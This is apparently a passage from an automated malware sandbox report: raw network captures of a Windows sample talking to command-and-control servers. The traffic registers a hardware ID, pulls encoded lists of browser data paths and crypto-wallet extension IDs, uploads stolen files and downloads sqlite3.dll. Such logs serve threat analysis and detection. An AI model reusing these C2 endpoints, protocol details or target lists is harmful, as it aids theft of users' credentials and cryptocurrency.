Jul 2, 2024 00:05:10.148520947 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:10 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49743	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:09.544337988 CEST	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 83 28 14 96 4e fa f9 94 00 0a bb 3c e9 f1 9d c9 f8 a9 7a 78 4c 19 f7 e4 f1 3f 3a 28 c4 3e 4b 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief(N<zxL?:(>K5/.vk.com#
Jul 2, 2024 00:05:10.248606920 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:10 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49763	5.42.99.177	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:18.306760073 CEST	272	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 517 Host: 5.42.99.177
Jul 2, 2024 00:05:18.306760073 CEST	517	OUT	Data Raw: 64 61 74 61 3d 36 59 62 52 41 62 54 37 77 44 67 6f 34 57 62 6d 6e 69 6e 34 76 76 4d 42 57 74 32 4e 67 77 78 6a 50 68 5f 77 73 6c 47 32 46 72 57 56 33 47 6d 68 36 4b 70 72 51 2d 78 35 49 65 72 53 47 44 6f 34 5a 74 72 6a 5a 66 79 43 56 6e 55 49 54 Data Ascii: data=6YbRAbT7wDgo4Wbmnin4vvMBWt2NgwxjPh_wslG2FrWV3Gmh6KprQ-x5IerSGDo4ZtrjZfyCVnUITk9yyRlY2m4Mi1_It5O9MHEC3k83ztG9QyR2q_JI1aCA05lV4b3MtIzz43xADIEg_t2aTP9tesWRubJWbPCnVoyjXmNkHTwBgvcB20-ZpxPEmfdfu-KkTCDYo5Ffb2MLMV4WLi6TPBKTKstzQzxcrGYXZNYCBo8pyN
Jul 2, 2024 00:05:24.670934916 CEST	363	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4a 67 34 72 32 75 68 38 52 66 74 77 6d 65 45 37 67 62 77 50 4e 41 4a 44 2b 61 61 6f 71 69 77 35 45 5a 4a 5a 4c 30 42 5a 2f 69 68 33 4a 47 4d 41 52 41 37 6b 79 5a 37 2b 55 45 30 4d 79 4e 74 75 54 63 5a 65 67 77 48 45 4a 4c 57 78 2b 46 46 52 5a 70 67 78 33 58 68 54 38 52 61 6f 72 57 66 63 6b 76 39 5a 32 55 44 63 4a 61 30 3d Data Ascii: Jg4r2uh8RftwmeE7gbwPNAJD+aaoqiw5EZJZL0BZ/ih3JGMARA7kyZ7+UE0MyNtuTcZegwHEJLWx+FFRZpgx3XhT8RaorWfckv9Z2UDcJa0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49764	85.28.47.4	80	6256	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:21.030719042 CEST	411	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI Host: 85.28.47.4 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 36 35 43 42 34 46 39 34 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="hwid"7365CB4F94144293944220------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build"default------CGIDAAAKJJDBGCBFCBGI--
Jul 2, 2024 00:05:21.629050970 CEST	384	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 156 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 54 52 6b 5a 6a 55 31 5a 54 59 77 4f 54 4a 69 5a 47 51 34 59 6a 63 33 59 6a 51 30 59 54 63 34 4e 7a 42 6a 4f 57 59 32 5a 57 49 32 4d 6a 64 68 4f 47 4d 35 4f 54 64 6a 4d 44 63 77 4e 54 4a 6c 4e 54 63 78 59 6a 59 30 4e 44 63 35 4d 47 46 6a 4d 6a 67 78 5a 44 63 77 5a 6a 45 33 4e 6d 52 6b 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: YTRkZjU1ZTYwOTJiZGQ4Yjc3YjQ0YTc4NzBjOWY2ZWI2MjdhOGM5OTdjMDcwNTJlNTcxYjY0NDc5MGFjMjgxZDcwZjE3NmRkfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
Jul 2, 2024 00:05:21.661322117 CEST	465	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCB Host: 85.28.47.4 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="message"browsers------KFIJEGCBGIDGHIDHDGCB--
Jul 2, 2024 00:05:21.846863985 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Jul 2, 2024 00:05:21.847460985 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Jul 2, 2024 00:05:21.916515112 CEST	464	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 85.28.47.4 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="message"plugins------HCAAEBKEGHJKEBFHJDBF--
Jul 2, 2024 00:05:22.098117113 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 5416 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Jul 2, 2024 00:05:22.098141909 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Jul 2, 2024 00:05:22.098160028 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Jul 2, 2024 00:05:22.098176956 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Jul 2, 2024 00:05:22.098192930 CEST	700	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Jul 2, 2024 00:05:22.338011980 CEST	465	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK Host: 85.28.47.4 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------EBGIDGCAFCBKECAAKJJKContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------EBGIDGCAFCBKECAAKJJKContent-Disposition: form-data; name="message"fplugins------EBGIDGCAFCBKECAAKJJK--
Jul 2, 2024 00:05:22.519615889 CEST	335	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jul 2, 2024 00:05:23.779395103 CEST	198	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE Host: 85.28.47.4 Content-Length: 6755 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 00:05:23.779449940 CEST	6755	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jul 2, 2024 00:05:24.501523018 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:25.826023102 CEST	89	OUT	GET /69934896f997d5bb/sqlite3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:26.008373022 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 